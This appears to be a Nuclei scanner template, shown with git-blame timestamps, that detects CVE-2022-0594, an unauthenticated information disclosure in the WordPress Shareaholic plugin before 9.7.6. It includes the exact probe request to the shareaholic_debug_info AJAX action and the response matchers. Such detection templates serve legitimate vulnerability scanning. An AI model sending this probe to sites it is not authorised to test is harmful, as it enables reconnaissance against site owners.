2022-09-08 13:28:46 +00:00
id : CVE-2022-0594
2022-08-22 07:17:05 +00:00
2022-07-30 08:43:08 +00:00
info :
2023-02-01 18:11:37 +00:00
name : WordPress Shareaholic <9.7.6 - Information Disclosure
2022-07-30 08:43:08 +00:00
author : atomiczsec
severity : medium
2023-02-01 18:11:37 +00:00
description : WordPress Shareaholic plugin prior to 9.7.6 is susceptible to information disclosure. The plugin does not have proper authorization check in one of the AJAX actions, available to both unauthenticated (before 9.7.5) and authenticated (in 9.7.5) users, allowing them to possibly obtain sensitive information such as active plugins and different versions (PHP, cURL, WP, etc.).
2022-07-30 08:43:08 +00:00
reference :
- https://wpscan.com/vulnerability/4de9451e-2c8d-4d99-a255-b027466d29b1
- https://wordpress.org/plugins/shareaholic/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0594
2023-02-01 18:11:37 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-0594
2022-07-30 08:43:08 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score : 5.3
cve-id : CVE-2022-0594
cwe-id : CWE-863
2023-07-11 19:49:27 +00:00
epss-score : 0.00243
cpe : cpe:2.3:a:shareaholic:shareaholic:*:*:*:*:*:wordpress:*:*
2022-07-30 08:43:08 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-06-04 08:13:42 +00:00
verified : true
2023-07-11 19:49:27 +00:00
framework : wordpress
vendor : shareaholic
product : shareaholic
2022-08-27 04:41:18 +00:00
tags : cve,cve2022,wordpress,wp,wp-plugin,exposure,wpscan
2023-07-11 19:49:27 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-09-08 13:28:46 +00:00
- method : GET
path :
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=shareaholic_debug_info"
matchers-condition : and
matchers :
- type : word
part : body
words :
- 'plugin_version'
- 'shareaholic_server_reachable'
condition : and
- type : word
part : header
words :
- "application/json"
- type : status
status :
- 200